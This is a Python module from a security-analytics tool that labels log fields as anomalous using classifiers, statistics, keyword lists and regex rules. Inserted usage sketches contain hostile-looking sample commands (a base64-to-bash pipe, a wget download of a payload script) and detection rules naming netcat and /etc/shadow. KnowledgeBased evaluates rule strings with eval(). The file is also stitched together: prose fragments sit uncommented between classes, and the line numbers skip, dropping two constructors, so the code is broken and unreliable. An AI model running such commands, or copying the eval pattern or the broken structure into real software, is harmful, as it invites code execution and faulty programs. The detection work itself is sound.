2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 |
20 | import sys
21 | import pandas as pd
22 | import numpy as np
23 | import re
24 | import math
25 |
26 | sys.path.append('')
27 | import json
28 | from osas.core.interfaces import LabelGenerator, Datasource
29 | from osas.core.utils import Tokenizer
30 | from enum import Enum
31 |
32 | from lol.api import LOLC
33 | from lol.api import PlatformType
34 | from obfuscation_detection import ObfuscationDetectionClassifier
35 |
36 |
37 | class ObfuscationField(LabelGenerator):
38 | """
39 | This type of Label generator handles fields that contain Linux/Windows commands. It uses machine learning
40 | to predict if a command is obfuscated or not.
41 | """
42 |
43 | def __init__(self, field_name: str = ''):
44 | self._model = {
45 | 'field_name': field_name,
46 | }
47 | self._classifier = ObfuscationDetectionClassifier()
48 |
49 | def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
50 | return self._model
51 |
52 | @staticmethod
53 | def from_pretrained(pretrained: str) -> object:
54 | lg = ObfuscationField()
55 | lg._model = json.loads(pretrained)
56 | lg._classifier = ObfuscationDetectionClassifier()
57 | return lg
58 |
59 | def __call__(self, object: dict) -> [str]:
60 | command = object[self._model['field_name']]
61 | classification = int(self._classifier.predict([command])[0])
62 | if classification == 1:
63 | ret = 'OBFUSCATED'
64 | else:
65 | ret = 'NOT OBFUSCATED'
66 | return [ret]
67 |
68 |
69 | class LOLFieldPlatform(Enum):
70 | LINUX = PlatformType.LINUX
71 | WINDOWS = PlatformType.WINDOWS
72 |
73 |
74 | class LOLField(LabelGenerator):
75 | """
76 |     This type of LabelGenerator handles fields that contain Linux/Windows commands. It uses machine learning to
77 |     predict if a command is part of a Living off the Land attack
78 | """
79 |
80 | def __init__(self, field_name: str = '', platform: LOLFieldPlatform = LOLFieldPlatform.LINUX, return_labels=False):
81 | """
82 | Constructor
83 | :param field_name: what field to look for in the data object
84 |         :param platform: choose which model to use (Windows/Linux)
85 | :param return_labels: return all generated labels or just the status (BAD, GOOD, NEUTRAL)
86 | """
87 | if platform == 'linux':
88 | platform = PlatformType.LINUX
89 | elif platform == 'windows':
90 | platform = PlatformType.WINDOWS
91 | platform_str = str(platform)
92 | self._model = {
93 | 'field_name': field_name,
94 | 'platform': platform_str,
95 | 'return_labels': return_labels
96 | }
97 | self._classifier = LOLC(platform=platform)
98 |
99 | def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
100 | return self._model
101 |
102 | @staticmethod
103 | def from_pretrained(pretrained: str) -> object:
104 | lg = LOLField()
105 | lg._model = json.loads(pretrained)
106 | platform = PlatformType.LINUX
107 | if lg._model['platform'] == 'PlatformType.WINDOWS':
108 | platform = PlatformType.WINDOWS
109 | lg._classifier = LOLC(platform=platform)
110 | return lg
111 |
112 | def __call__(self, object: dict):
113 | command = object[self._model['field_name']]
114 | status, labels = self._classifier(command)
115 | ret_labels = [status]
116 | if self._model['return_labels']:
117 | for label in labels:
118 | ret_labels.append(label)
119 | return ret_labels
120 |
121 |
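A hedged usage sketch for the two command-oriented generators above; both wrap external classifiers and only need the name of the command field (field and command values below are illustrative):

# Hypothetical field name; the LOLField constructor also accepts the plain strings 'linux'/'windows'.
lol = LOLField(field_name='command', platform='linux', return_labels=True)
obf = ObfuscationField(field_name='command')

event = {'command': 'base64 -d payload | bash'}
print(lol(event))  # e.g. ['BAD', ...] plus the individual LOLC labels when return_labels=True
print(obf(event))  # ['OBFUSCATED'] or ['NOT OBFUSCATED']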
122 | class NumericField(LabelGenerator):
123 | """
124 | This type of LabelGenerator handles numerical fields. It computes the mean and standard deviation and generates
125 | labels according to the distance between the current value and the mean value
126 |     (value<=sigma NORMAL, sigma<value<=2*sigma BORDERLINE, 2*sigma<value OUTLIER)
127 |     """
173 |     def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
174 | incremental = False
175 | if self._model['mean'] is not None:
176 | ex_mean = self._model['mean']
177 | ex_stdev = self._model['std_dev']
178 | ex_count = self._model['count']
179 | incremental = True
180 | group_by = self._model['group_by']
181 | if group_by is None:
182 | mean = 0
183 | stdev = 0
184 | count = 0
185 | else:
186 | mean = {}
187 | stdev = {}
188 | count = {}
189 | # mean
190 | for item in dataset:
191 | cc = 1
192 | if count_column is not None:
193 | cc = int(item[count_column])
194 | if group_by is None:
195 | mean += item[self._model['field_name']] * cc
196 | count += cc
197 | else:
198 | key = self._get_group_by_value(item, group_by)
199 | if key not in mean:
200 | mean[key] = 0
201 | stdev[key] = 0
202 | count[key] = 0
203 | mean[key] += item[self._model['field_name']] * cc
204 | count[key] += cc
205 |
206 | if group_by is None:
207 | mean /= count
208 | else:
209 | for key in mean:
210 | mean[key] /= count[key]
211 | # stdev
212 | for item in dataset:
213 | cc = 1
214 | if count_column is not None:
215 | cc = int(item[count_column])
216 | if group_by is None:
217 | stdev += ((item[self._model['field_name']] - mean) ** 2) * cc
218 | else:
219 | key = self._get_group_by_value(item, group_by)
220 | stdev[key] += ((item[self._model['field_name']] - mean[key]) ** 2) * cc
221 |
222 | if group_by is None:
223 | stdev /= count
224 | stdev = math.sqrt(stdev)
225 | else:
226 | for key in stdev:
227 | stdev[key] /= count[key]
228 | stdev[key] = math.sqrt(stdev[key])
229 |
230 | # update if incremental
231 | if incremental:
232 | if group_by is None:
233 | new_mean = (ex_mean * ex_count + mean * count) / (ex_count + count)
234 | new_stdev = (((ex_stdev ** 2) * ex_count) + ((stdev ** 2) * count)) / (ex_count + count)
235 | new_count = ex_count + count
236 | else:
237 | new_mean = {}
238 | new_stdev = {}
239 | new_count = {}
240 | for key in mean:
241 | if key in ex_mean:
242 | new_mean[key] = (ex_mean[key] * ex_count[key] + mean[key] * count[key]) / (
243 | ex_count[key] + count[key])
244 | new_stdev[key] = (((ex_stdev[key] ** 2) * ex_count[key]) + ((stdev[key] ** 2) * count[key])) / (
245 | ex_count[key] + count[key])
246 | new_count[key] = ex_count[key] + count[key]
247 | else:
248 | new_mean[key] = mean[key]
249 | new_stdev[key] = stdev[key]
250 | new_count[key] = count[key]
251 | # transfer ex-values
252 | for key in ex_mean:
253 | if key not in mean:
254 | new_mean[key] = ex_mean[key]
255 | new_stdev[key] = ex_stdev[key]
256 | new_count[key] = ex_count[key]
257 |
258 | mean = new_mean
259 | stdev = new_stdev
260 | count = new_count
261 | # store
262 | self._model['mean'] = mean
263 | self._model['std_dev'] = stdev
264 | self._model['count'] = count
265 | # check sanity and warn user
266 | font_style = '\033[93m'
267 | mean_is_zero = False
268 | stdev_is_zero = False
269 | if self._model['group_by'] is None:
270 | if self._model['mean'] == 0:
271 | mean_is_zero = True
272 | if self._model['std_dev'] == 0:
273 | stdev_is_zero = True
274 | else:
275 | for key in self._model['mean']:
276 | if self._model['mean'][key] == 0:
277 | mean_is_zero = True
278 | if self._model['std_dev'][key] == 0:
279 | stdev_is_zero = True
280 |         if mean_is_zero and not self._model.get('stdev', True):
281 | sys.stdout.write('\t{0}::WARNING:You have a mean of 0. Any deviation will be flagged\n'.format(font_style))
282 |         if stdev_is_zero and self._model.get('stdev', True):
283 | sys.stdout.write(
284 | '\t{0}::WARNING:You have a standard deviation of 0. Any deviation will be flagged\n'.format(font_style))
285 |
286 | return self._model
287 |
288 | # def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
289 | # from osas.data.datasources import CSVDataColumn
290 | # incremental = False
291 | # if self._model['mean'] is not None:
292 | # ex_mean = self._model['mean']
293 | # ex_stdev = self._model['std_dev']
294 | # ex_count = self._model['count']
295 | # incremental = True
296 | # if count_column is None:
297 | # mean = CSVDataColumn(dataset[self._model['field_name']]).mean()
298 | # stdev = CSVDataColumn(dataset[self._model['field_name']]).std()
299 | # count = len(dataset[self._model['field_name']])
300 | # self._model['mean'] = mean
301 | # self._model['std_dev'] = stdev
302 | # self._model['count'] = count
303 | # else:
304 | # mean = CSVDataColumn(dataset[self._model['field_name']] * dataset[count_column]).sum()
305 | # stdev = ((CSVDataColumn(dataset[self._model['field_name']] * dataset[count_column]) - mean) ** 2).sum()
306 | # count = dataset[count_column].sum()
307 | # mean = mean / count
308 | # stdev = math.sqrt(stdev / count)
309 | #
310 | # self._model['mean'] = mean
311 | # self._model['std_dev'] = stdev
312 | # self._model['count'] = count
313 | #
314 | # if incremental:
315 | # new_count = ex_count + count
316 | # new_mean = (mean * count + ex_mean * ex_count) / new_count
317 | # new_stdev = math.sqrt(((ex_stdev ** 2) * ex_count + (stdev ** 2) * count) / new_count)
318 | # self._model['mean'] = new_mean
319 | # self._model['std_dev'] = new_stdev
320 | # self._model['count'] = new_count
321 | #
322 | # return self._model
323 |
324 | def _get_labels(self, cur_value, mean_val, std_val, stdev, stdev_borderline_threshold,
325 | stdev_outlier_threshold, spike, spike_inverse, spike_borderline_threshold,
326 | spike_outlier_threshold, label_for_normal):
327 | labels = []
328 | if stdev:
329 | if std_val == 0:
330 | std_val = 0.01
331 | stdev_ratio = abs(cur_value - mean_val) / std_val
332 |
333 | # if using both stdev and spike, calculate a spike from the stdev
334 | if stdev and spike != 'none':
335 | if not spike_inverse:
336 | mean_val = mean_val + std_val
337 | else:
338 | mean_val = mean_val - std_val
339 |
340 | if spike == 'ratio':
341 | if not spike_inverse:
342 | if mean_val == 0:
343 | mean_val = 0.01
344 | spike_ratio = cur_value / mean_val
345 | else:
346 | if cur_value == 0:
347 | cur_value = 0.01
348 | spike_ratio = mean_val / cur_value
349 | elif spike == 'fixed':
350 | if not spike_inverse:
351 | spike_ratio = cur_value - mean_val
352 | else:
353 | spike_ratio = mean_val - cur_value
354 |
355 | field_name = self._model['field_name'].upper()
356 |
357 | if stdev and spike != 'none' and stdev_ratio < stdev_outlier_threshold:
358 | # if both are activated, and event is within stdev outlier threshold
359 | if label_for_normal:
360 | labels.append('{0}_NORMAL'.format(field_name))
361 | else:
362 | if stdev and spike == 'none':
363 | # only stdev is activated
364 | ratio = stdev_ratio
365 | borderline_threshold = stdev_borderline_threshold
366 | outlier_threshold = stdev_outlier_threshold
367 | else:
368 | # if only spike is activated or both are activated, use spike ratio
369 | ratio = spike_ratio
370 | borderline_threshold = spike_borderline_threshold
371 | outlier_threshold = spike_outlier_threshold
372 |
373 | if label_for_normal and ratio < borderline_threshold:
374 | labels.append('{0}_NORMAL'.format(field_name))
375 | elif borderline_threshold < ratio < outlier_threshold:
376 | labels.append('{0}_BORDERLINE'.format(field_name))
377 | elif ratio >= outlier_threshold:
378 | labels.append('{0}_OUTLIER'.format(field_name))
379 |
380 | return labels
381 |
382 | def __call__(self, input_object: dict) -> [str]:
383 | labels = []
384 | mean_val = self._model['mean']
385 | std_val = self._model['std_dev']
386 | count_val = self._model['count']
387 | field_name = self._model['field_name'].upper()
388 | label_for_normal = True
389 | if 'label_for_normal' in self._model:
390 | label_for_normal = self._model['label_for_normal']
391 |
392 | stdev = True
393 | if 'stdev' in self._model:
394 | stdev = bool(self._model['stdev'])
395 |
396 | stdev_borderline_threshold = 1
397 | if 'stdev_borderline_threshold' in self._model:
398 | stdev_borderline_threshold = self._model['stdev_borderline_threshold']
399 |
400 | stdev_outlier_threshold = 2
401 | if 'stdev_outlier_threshold' in self._model:
402 | stdev_outlier_threshold = self._model['stdev_outlier_threshold']
403 |
404 | spike = 'none'
405 | if 'spike' in self._model:
406 | spike = self._model['spike']
407 |
408 | spike_inverse = False
409 | if 'spike_inverse' in self._model:
410 | spike_inverse = bool(self._model['spike_inverse'])
411 |
412 | spike_borderline_threshold = 10
413 | if 'spike_borderline_threshold' in self._model:
414 | spike_borderline_threshold = self._model['spike_borderline_threshold']
415 |
416 | spike_outlier_threshold = 20
417 | if 'spike_outlier_threshold' in self._model:
418 | spike_outlier_threshold = self._model['spike_outlier_threshold']
419 |
420 | try:
421 | cur_value = float(input_object[self._model['field_name']])
422 |         except Exception:
423 | return ['{0}_BAD_VALUE'.format(field_name)]
424 | group_by = self._model['group_by']
425 | if group_by is None:
426 | new_labels = self._get_labels(cur_value,
427 | mean_val,
428 | std_val,
429 | stdev,
430 | stdev_borderline_threshold,
431 | stdev_outlier_threshold,
432 | spike,
433 | spike_inverse,
434 | spike_borderline_threshold,
435 | spike_outlier_threshold,
436 | label_for_normal)
437 | for label in new_labels:
438 | labels.append(label)
439 | # distance = abs((cur_value) - mean_val)
440 | # if label_for_normal and distance <= std_val:
441 | # labels.append(field_name + '_NORMAL')
442 | # elif std_val < distance <= (2 * std_val):
443 | # labels.append(field_name + '_BORDERLINE')
444 | # elif (2 * std_val) < distance:
445 | # labels.append(field_name + '_OUTLIER')
446 | else:
447 | key = self._get_group_by_value(input_object, group_by)
448 | if key in mean_val:
449 | count = count_val[key]
450 | if count > 5:
451 | new_labels = self._get_labels(cur_value,
452 | mean_val[key],
453 | std_val[key],
454 | stdev,
455 | stdev_borderline_threshold,
456 | stdev_outlier_threshold,
457 | spike,
458 | spike_inverse,
459 | spike_borderline_threshold,
460 | spike_outlier_threshold,
461 | label_for_normal)
462 | for label in new_labels:
463 | labels.append(label)
464 |
465 | # distance = abs((cur_value) - mean_val[key])
466 | #
467 | # if distance <= std_val[key]:
468 | # labels.append(field_name + '_NORMAL')
469 | # elif std_val[key] < distance <= (2 * std_val[key]):
470 | # labels.append(field_name + '_BORDERLINE')
471 | # elif (2 * std_val[key]) < distance:
472 | # labels.append(field_name + '_OUTLIER')
473 | else:
474 | labels.append('RARE_KEY_FOR_{0}'.format(field_name))
475 | else:
476 | labels.append('UNSEEN_KEY_FOR_{0}'.format(field_name))
477 |
478 | return labels
479 |
480 | @staticmethod
481 | def from_pretrained(pretrained: str) -> LabelGenerator:
482 | lg = NumericField()
483 | lg._model = json.loads(pretrained)
484 | return lg
485 |
486 |
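A hedged usage sketch for the generator above, relying only on the constructor form used in the __main__ block at the end of this file (NumericField('count')); the CSV path is hypothetical and the borderline/outlier thresholds default to 1 and 2 standard deviations:

from osas.data.datasources import CSVDataSource

# Hypothetical CSV with a numeric 'count' column.
dataset = CSVDataSource('corpus/events.csv')

nfc = NumericField('count')
nfc.build_model(dataset)

# For a single row, the label depends on |value - mean| / stdev:
# below the borderline threshold (default 1) -> COUNT_NORMAL,
# between the borderline and outlier thresholds -> COUNT_BORDERLINE,
# at or above the outlier threshold (default 2) -> COUNT_OUTLIER.
print(nfc({'count': 10}))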
487 | class TextField(LabelGenerator):
488 | """
489 |     This type of LabelGenerator handles text fields. It builds an n-gram based language model and computes the
490 |     perplexity of newly observed data. It also holds statistics over the training data (mean and stdev).
491 |     (perplexity<=sigma NORMAL, sigma<perplexity<=2*sigma BORDERLINE, 2*sigma<perplexity OUTLIER)
492 |     """
511 |     def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
512 | unigram2count = {}
513 | for item in dataset:
514 | text = item[self._field_name]
515 | unigrams = self._get_ngrams(text, unigrams_only=True)
516 | occ_number = 1
517 | if count_column is not None:
518 | occ_number = item[count_column]
519 | for unigram in unigrams:
520 | if unigram not in unigram2count:
521 | unigram2count[unigram] = occ_number
522 | else:
523 | unigram2count[unigram] += occ_number
524 | for unigram in unigram2count:
525 | if unigram2count[unigram] > 2:
526 | self._accepted_unigrams[unigram] = 1
527 |
528 | for item in dataset:
529 | text = item[self._field_name]
530 | ngrams = self._get_ngrams(text)
531 | occ_number = 1
532 | if count_column is not None:
533 | occ_number = item[count_column]
534 | for ngram in ngrams:
535 | if len(ngram) == self._ngram_range[0]:
536 | self._total_inf += occ_number
537 | if ngram in self._model:
538 | self._model[ngram] += occ_number
539 | else:
540 | self._model[ngram] = occ_number
541 | # for ngram in self._model:
542 | # self._model[ngram] =
543 | ser_model = [self._field_name, self._lm_mode, self._ngram_range[0], self._ngram_range[1], self._mean_perplex,
544 | self._std_perplex, self._total_inf]
545 |
546 |         all_perplex = np.zeros((len(dataset)), dtype=float)
547 |         for ii in range(len(dataset)):
548 |             text = dataset[ii][self._field_name]
549 |             all_perplex[ii] = self._compute_perplexity(text)
550 |
551 | self._mean_perplex = np.mean(all_perplex)
552 | self._std_perplex = np.std(all_perplex)
553 | ser_model[4] = self._mean_perplex
554 | ser_model[5] = self._std_perplex
555 | ser_model.append(self._accepted_unigrams)
556 | for item in self._model:
557 | ser_model.append(item)
558 | ser_model.append(self._model[item])
559 |
560 | return ser_model
561 |
562 | def _compute_perplexity(self, text):
563 | total = 0
564 | ngrams = self._get_ngrams(text)
565 |
566 | for ngram in ngrams:
567 | if ngram in self._model:
568 | sup_count = math.log(self._model[ngram]) + 1
569 | total += 1 / sup_count
570 | # if ngram[:-1] in self._model:
571 | # inf_count = self._model[ngram[:-1]]
572 | # else:
573 | # inf_count = self._total_inf
574 | # total += math.log(sup_count / inf_count)
575 | else:
576 | total += -math.log(1e-8) # small prob for unseen events
577 | return total / len(ngrams)
578 |
579 | def __call__(self, input_object: dict) -> [str]:
580 | perplexity = self._compute_perplexity(input_object[self._field_name])
581 | if perplexity - self._mean_perplex < 2 * self._std_perplex:
582 | return [perplexity * 10]
583 | elif perplexity - self._mean_perplex < 4 * self._std_perplex:
584 | return ['{0}_HIGH_PERPLEXITY'.format(self._field_name.upper()), perplexity * 10]
585 | else:
586 |             return ['{0}_EXTREME_PERPLEXITY'.format(self._field_name.upper()), perplexity * 10]
587 |
588 | @staticmethod
589 | def from_pretrained(pretrained: str) -> LabelGenerator:
590 | json_obj = json.loads(pretrained)
591 | field_name = json_obj[0]
592 | lm_mode = json_obj[1]
593 | ngram_range = (json_obj[2], json_obj[3])
594 | new_instance = TextField(field_name, lm_mode, ngram_range)
595 | new_instance._mean_perplex = json_obj[4]
596 | new_instance._std_perplex = json_obj[5]
597 | new_instance._total_inf = json_obj[6]
598 | new_instance._accepted_unigrams = json_obj[7]
599 | for ii in range((len(json_obj) - 8) // 2):
600 | ngram = tuple(json_obj[ii * 2 + 8])
601 | count = json_obj[ii * 2 + 8 + 1]
602 | new_instance._model[ngram] = count
603 | return new_instance
604 |
605 | def _get_ngrams(self, text, unigrams_only=False):
606 | text = str(text)
607 | use_chars = self._lm_mode == 'char'
608 | toks = Tokenizer.tokenize(text, use_chars=use_chars)
609 | if unigrams_only:
610 | return toks
611 | new_toks = []
612 | for tok in toks:
613 | if tok in self._accepted_unigrams:
614 | new_toks.append(tok)
615 | else:
616 |                 new_toks.append('<UNK>')
617 | toks = new_toks
618 |
619 | # prepend and append
620 | c_append = self._ngram_range[0] - 1
621 |         start = ['<s>' for _ in range(c_append)]
622 |         stop = ['</s>' for _ in range(c_append)]
623 | toks = start + toks + stop
624 | ngrams = []
625 | for ngram_order in range(self._ngram_range[0], self._ngram_range[1] + 1):
626 | for ii in range(len(toks) - ngram_order):
627 | ngram = tuple(toks[ii:ii + ngram_order])
628 | ngrams.append(ngram)
629 | return ngrams
630 |
631 |
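To make the scoring above concrete, a small worked example of _compute_perplexity with made-up counts; __call__ then compares the result against the mean and standard deviation observed during training:

import math

# Hypothetical counts: an n-gram seen 20 times contributes 1 / (log(20) + 1),
# an unseen n-gram contributes -log(1e-8); the total is averaged over all n-grams.
seen = 1 / (math.log(20) + 1)     # ~0.25
unseen = -math.log(1e-8)          # ~18.42
perplexity = (seen + unseen) / 2  # average over the two n-grams

# Within 2 stdev of the training mean only the raw score (scaled by 10) is returned;
# between 2 and 4 stdev the <FIELD>_HIGH_PERPLEXITY label is added,
# and beyond that <FIELD>_EXTREME_PERPLEXITY.
print(round(perplexity, 3))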
632 | class MultinomialField(LabelGenerator):
633 | def __init__(self, field_name: str = '', absolute_threshold: int = 10, relative_threshold: float = 0.1,
634 | group_by: str = None):
635 | """
636 | Constructor
637 | :param field_name: What field to use
638 | :param absolute_threshold: Minimum absolute value for occurrences to trigger alert for
639 | :param relative_threshold: Minimum relative value for occurrences to trigger alert for
640 | """
641 | self._mfc = MultinomialFieldCombiner([field_name], absolute_threshold, relative_threshold, group_by=group_by)
642 |
643 | def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
644 | return self._mfc.build_model(dataset, count_column=count_column)
645 |
646 | def __call__(self, item: dict) -> [str]:
647 | lbls = self._mfc(item)
648 | lbls = [l.replace('_PAIR', '') for l in lbls]
649 | return lbls
650 |
651 | @staticmethod
652 | def from_pretrained(pretrained: str) -> LabelGenerator:
653 | lg = MultinomialFieldCombiner()
654 | lg._model = json.loads(pretrained)
655 | mf = MultinomialField()
656 | mf._mfc = lg
657 | return mf
658 |
659 |
660 | class MultinomialFieldCombiner(LabelGenerator):
661 | def __init__(self, field_names: [str] = [], absolute_threshold: int = 10, relative_threshold: float = 0.1,
662 | group_by: str = None):
663 | """
664 | Constructor
665 | :param field_names: What fields to combine
666 | :param absolute_threshold: Minimum absolute value for occurrences to trigger alert for
667 | :param relative_threshold: Minimum relative value for occurrences to trigger alert for
668 | """
669 | self._model = {'pair2count': {},
670 | 'pair2prob': {},
671 | 'absolute_threshold': absolute_threshold,
672 | 'relative_threshold': relative_threshold,
673 | 'field_names': field_names,
674 | 'group_by': group_by
675 | }
676 |
677 | def _get_group_by_value(self, item, group_by):
678 | if isinstance(group_by, str):
679 | return str(item[group_by])
680 | else:
681 | return "({0})".format(','.join([str(item[k]) for k in group_by]))
682 |
683 | def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
684 | pair2count = self._model['pair2count'] # this is used for incremental updates
685 | group_by_field = self._model['group_by']
686 | total = 0
687 | for item in dataset:
688 | if group_by_field is not None:
689 | gbv = self._get_group_by_value(item, group_by_field) # str(item[group_by_field])
690 | if gbv not in self._model['pair2count']:
691 | self._model['pair2count'][gbv] = {'TOTAL': 0}
692 | pair2count = self._model['pair2count'][gbv]
693 | combined = [str(item[field]) for field in self._model['field_names']]
694 | combined = '(' + ','.join(combined) + ')'
695 | occ_number = 1
696 | if count_column is not None:
697 | occ_number = int(item[count_column])
698 | total += occ_number
699 | if group_by_field is not None:
700 | self._model['pair2count'][gbv]['TOTAL'] += occ_number
701 | if combined not in pair2count:
702 | pair2count[combined] = occ_number
703 | else:
704 | pair2count[combined] += occ_number
705 |
706 | pair2prob = {}
707 | if group_by_field is None:
708 | for key in pair2count:
709 | pair2prob[key] = pair2count[key] / total
710 | else:
711 | pair2count = self._model['pair2count']
712 | for k1 in pair2count:
713 | pair2prob[k1] = {}
714 | total = int(pair2count[k1]['TOTAL'])
715 | for key in pair2count[k1]:
716 | pair2prob[k1][key] = pair2count[k1][key] / total
717 |
718 | self._model['pair2count'] = pair2count
719 | self._model['pair2prob'] = pair2prob
720 |
721 | return self._model
722 |
723 | def __call__(self, item: dict) -> [str]:
724 | fname = ('_'.join(self._model['field_names'])).upper() + '_PAIR'
725 | gname = ''
726 | if self._model['group_by'] is not None:
727 | gby = self._model['group_by']
728 | if not isinstance(self._model['group_by'], list):
729 | gby = [gby]
730 | gname = '_BASED_ON_{0}'.format('_'.join([str(k).upper() for k in gby]))
731 | combined = [str(item[field]) for field in self._model['field_names']]
732 | combined = '(' + ','.join(combined) + ')'
733 |
734 | pair2prob = self._model['pair2prob']
735 | pair2count = self._model['pair2count']
736 | group_by = self._model['group_by']
737 | if group_by is not None:
738 | gbv = self._get_group_by_value(item, group_by)
739 | if gbv not in pair2prob:
740 | return []
741 | pair2prob = self._model['pair2prob'][gbv]
742 | pair2count = self._model['pair2count'][gbv]
743 |
744 | if combined not in pair2prob:
745 | return ['UNSEEN_{0}{1}'.format(fname, gname)]
746 | else:
747 | labels = []
748 |
749 | prob = pair2prob[combined]
750 | cnt = pair2count[combined]
751 |
752 | if cnt < self._model['absolute_threshold']:
753 | labels.append('LOW_OBS_COUNT_FOR_{0}{1}'.format(fname, gname))
754 | if prob < self._model['relative_threshold']:
755 | labels.append('LOW_OBS_PROB_FOR_{0}{1}'.format(fname, gname))
756 | return labels
757 |
758 | @staticmethod
759 | def from_pretrained(pretrained: str) -> LabelGenerator:
760 | lg = MultinomialFieldCombiner()
761 | lg._model = json.loads(pretrained)
762 | return lg
763 |
764 |
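A brief usage sketch of the combiner above, mirroring the __main__ block at the end of this file (the CSV path and field values are hypothetical); the emitted labels combine UNSEEN_ / LOW_OBS_COUNT_FOR_ / LOW_OBS_PROB_FOR_ with the upper-cased field pair, plus a _BASED_ON_ suffix when group_by is set:

from osas.data.datasources import CSVDataSource

# Hypothetical CSV with 'user' and 'parent_process' columns.
dataset = CSVDataSource('corpus/process_events.csv')

mfc = MultinomialFieldCombiner(['user', 'parent_process'],
                               absolute_threshold=500,
                               relative_threshold=0.005)
mfc.build_model(dataset)

# A (user, parent_process) pair never seen in training yields
# ['UNSEEN_USER_PARENT_PROCESS_PAIR']; a rarely seen pair yields the
# LOW_OBS_COUNT_FOR_... / LOW_OBS_PROB_FOR_... labels instead.
print(mfc({'user': 'root', 'parent_process': 'nc'}))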
765 | class NumericalFieldCombiner(LabelGenerator):
766 | def __init__(self, field_names: [str], normalize=True):
767 | """
768 |
769 | :param field_names: What fields to combine
770 | :param normalize: Normalize each field using standard deviation before processing
771 | """
772 | self._field_names = field_names
773 | self._normalize = normalize
774 |
775 | def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
776 | pass
777 |
778 | def __call__(self, input_object: dict) -> [str]:
779 | pass
780 |
781 | @staticmethod
782 | def from_pretrained(pretrained: str) -> LabelGenerator:
783 | pass
784 |
785 |
786 | class KeywordBased(LabelGenerator):
787 | def __init__(self, keyword_list: list, field_name: str):
788 | if isinstance(keyword_list, str):
789 | keyword_list = re.sub('[^0-9a-zA-Z]+', ' ', keyword_list)
790 | keyword_list = keyword_list.split(' ')
791 | self._label_list = [item for item in keyword_list]
792 | self._field_name = field_name
793 |
794 | def __call__(self, input_object: dict):
795 | label_list = []
796 | text = str(input_object[self._field_name])
797 | text = re.sub('[^0-9a-zA-Z]+', ' ', text)
798 | word_list = text.split(' ')
799 | for ii in range(len(self._label_list)):
800 | if self._label_list[ii] in word_list:
801 | label_list.append("{0}_KEYWORD_{1}".format(self._field_name.upper(), self._label_list[ii].upper()))
802 | return label_list
803 |
804 | def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
805 | return {'field_name': self._field_name,
806 | 'keyword_list': self._label_list}
807 |
808 | @staticmethod
809 | def from_pretrained(pretrained: str) -> object:
810 | obj = json.loads(pretrained)
811 | keyword_list = obj['keyword_list']
812 | field_name = obj['field_name']
813 | klg = KeywordBased(keyword_list, field_name)
814 | return klg
815 |
816 |
817 | class KnowledgeBased(LabelGenerator):
818 | def __init__(self, rules_and_labels_tuple_list: list, field_name: str):
819 | if isinstance(rules_and_labels_tuple_list, str):
820 | # we need to parse this
821 | rules_and_labels_tuple_list = eval(rules_and_labels_tuple_list)
822 | self._regex_list = [re.compile(item[0]) for item in rules_and_labels_tuple_list]
823 | self._regex_list_str = [item[0] for item in rules_and_labels_tuple_list]
824 | self._label_list = [item[1] for item in rules_and_labels_tuple_list]
825 | self._field_name = field_name
826 |
827 | def __call__(self, input_object: dict) -> [str]:
828 | label_list = []
829 | text = str(input_object[self._field_name])
830 | for ii in range(len(self._label_list)):
831 | if self._regex_list[ii].search(text):
832 | label_list.append(self._label_list[ii])
833 | return label_list
834 |
835 | def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
836 | return {
837 | 'field_name': self._field_name,
838 | 'label_list': self._label_list,
839 | 'regex_list': self._regex_list_str
840 | }
841 |
842 | @staticmethod
843 | def from_pretrained(pretrained: str) -> object:
844 | obj = json.loads(pretrained)
845 | label_list = obj['label_list']
846 | regex_list = obj['regex_list']
847 | field_name = obj['field_name']
848 | reg_lab = [(regex, label) for regex, label in zip(regex_list, label_list)]
849 | kblg = KnowledgeBased(reg_lab, field_name)
850 | return kblg
851 |
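A short sketch of the rule format expected by the generator above: a list of (regex, label) tuples, which may also be supplied as a string that evaluates to such a list. The rules and command below are hypothetical:

# Each tuple is (pattern, label to emit when the pattern matches the field).
rules = [
    (r'wget\s+http', 'DOWNLOAD_IN_COMMAND'),
    (r'/etc/shadow', 'SHADOW_FILE_ACCESS'),
]
kb = KnowledgeBased(rules, field_name='command')

# Every rule whose regex matches the field contributes its label.
print(kb({'command': 'wget http://10.0.0.1/payload.sh'}))  # ['DOWNLOAD_IN_COMMAND']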
852 |
853 | if __name__ == '__main__':
854 | mfc = MultinomialFieldCombiner(['user', 'parent_process'], absolute_threshold=500, relative_threshold=0.005)
855 | nfc = NumericField('count')
856 | tf = TextField('command', lm_mode='token', ngram_range=(3, 5))
857 | klg = KeywordBased(keyword_list=['bash', 'java', 'netcat', 'sudo', 'apache2'], field_name='command')
858 | from osas.data.datasources import CSVDataSource
859 |
860 | dataset = CSVDataSource('corpus/test.csv')
861 | print("Building model")
862 | klg.build_model(dataset)
863 | print("Done")
864 |
865 | # rez = mfc.build_model(dataset)
866 | for item in dataset[:20]:
867 | print("\n\n")
868 | print(item)
869 | print("")
870 | print(klg(item))
871 | print("\n\n")
872 | print("=" * 20)
873 |
--------------------------------------------------------------------------------